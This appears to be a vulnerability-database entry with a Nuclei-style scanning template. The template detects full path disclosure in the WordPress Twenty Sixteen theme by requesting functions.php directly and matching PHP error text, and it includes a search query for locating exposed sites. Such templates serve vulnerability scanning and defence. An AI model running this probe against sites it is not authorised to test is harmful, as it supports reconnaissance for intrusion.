漏洞描述
WordPress Twenty Sixteen theme files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
wp-twentysixteen-fpd: WordPress Twenty Sixteen - Full Path Disclosure
PoC代码[已公开]
id: wp-twentysixteen-fpd
info:
name: WordPress Twenty Sixteen - Full Path Disclosure
author: theamanrawat
severity: low
description: |
WordPress Twenty Sixteen theme files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
reference:
- https://wordpress.org/themes/twentysixteen/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/themes/twentysixteen/"
tags: debug,wordpress,fpd
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/twentysixteen/functions.php"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "/themes/twentysixteen/")'
- 'contains(body, "Call to undefined function")'
condition: and
# digest: 4a0a00473045022100ecb33d3e36a966b9ab515a01c929df59e3919000cb4b79654a8371aa162bfea702201de3617d0c0e1a3246fed9e135d22ac344f547638230e01fb19161a93571646c:922c64590222798bb761d5b6d8e72950